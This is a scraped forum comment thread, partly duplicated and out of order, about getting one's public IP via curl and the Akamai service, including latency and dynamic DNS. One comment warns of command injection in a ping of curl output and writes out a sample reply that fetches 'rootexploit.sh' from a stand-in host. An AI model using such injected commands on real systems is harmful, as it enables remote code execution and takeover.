The point of this submission was more to point out you can do `curl whatismyip.akamai.com` rather than "ping `curl whatismyip.akamai.com`" specifically, but that's still interesting.
I was just trying to measure the latency to the server, an important characteristic for this service.
Previous ones I've used in the past (e.g., to update a dynamic DNS server) have suffered from excessive (multi-second) latency or would simply timeout unpredictably. I ended up writing my own on appspot.com.
That won't show you the public IP if you're behind a NAT. Why would you need the public IP instead of the private one? For example because you're trying to search for requests coming from that machin in some logs, take traffic traces from somewhere beyond the NAT, etc.
I may be wrong here, but would just returning \`rootyourmachine.sh\`` in the request body therefore work?
Edit: Serving that from a web server via ping `curl localhost:9999` only causes ping to respond with a usage warning, as if you had entered an incorrect command.
Is there a way to "break out of" ping from here, though?
> Looks like you're right - I thought you could do it by injecting a quote or something, but apparently not.
Still, I think it's a good way to think. Expect that there's a way for that input to do something malicious, even if it doesn't seem immediately possible.
I have a dynamic DNS daemon that fetches my IP via HTTP GET, and the first thing I do is validate that it's actually an IP before I do anything else with it.
The output from curl is being tacked onto 'ping ' and executed, so there's nothing stopping a malicious server from returning something like '127.0.0.1; $(curl http://pwn.your.box/rootexploit.sh) ' instead of just your IP.
on a side note, http://l2.io/ip.js is pretty cool. since it allows script injection into the return, it can be used clientside to inject their ip into the webpage. Pretty cool if you're posting from static html to a 3rd party form.
From the methods outlined in the thread so far, I think I'd pick Akamai after a quick test of each of them. (results in the following are based on the 'real' value returned in a 'time' command
50 comments
[ 5.2 ms ] story [ 103 ms ] threadGood find, thanks.
Previous ones I've used in the past (e.g., to update a dynamic DNS server) have suffered from excessive (multi-second) latency or would simply timeout unpredictably. I ended up writing my own on appspot.com.
But the Akamai service is obviously much easier to use from a script.
Depending on the router, it might be simpler and more reliable to interrogate the router.
Also, some routers come with dynamic DNS updating built in (dynamic DNS is a common reason for needing this service).
That, plus knowing which interface to inspect among those returned by ifconfig isn't always obvious.
Edit: Serving that from a web server via ping `curl localhost:9999` only causes ping to respond with a usage warning, as if you had entered an incorrect command.
Is there a way to "break out of" ping from here, though?
Sorry, gut reaction to command interpolation with curl.
Still, I think it's a good way to think. Expect that there's a way for that input to do something malicious, even if it doesn't seem immediately possible.
I have a dynamic DNS daemon that fetches my IP via HTTP GET, and the first thing I do is validate that it's actually an IP before I do anything else with it.
Edit: This is completely wrong, and doesn't work.
Scare tactics work, no doubt, but that's just pathetic.
If you are really trying to help people, why not tell them to control their own DNS? That's what djb advises.
Kick the third party DNS habit.
<script type="text/javascript" src="http://l2.io/ip.js?var=document.getElementById(ip1).value...;
works where item ip1 is where you want to IP address to end up on the client html.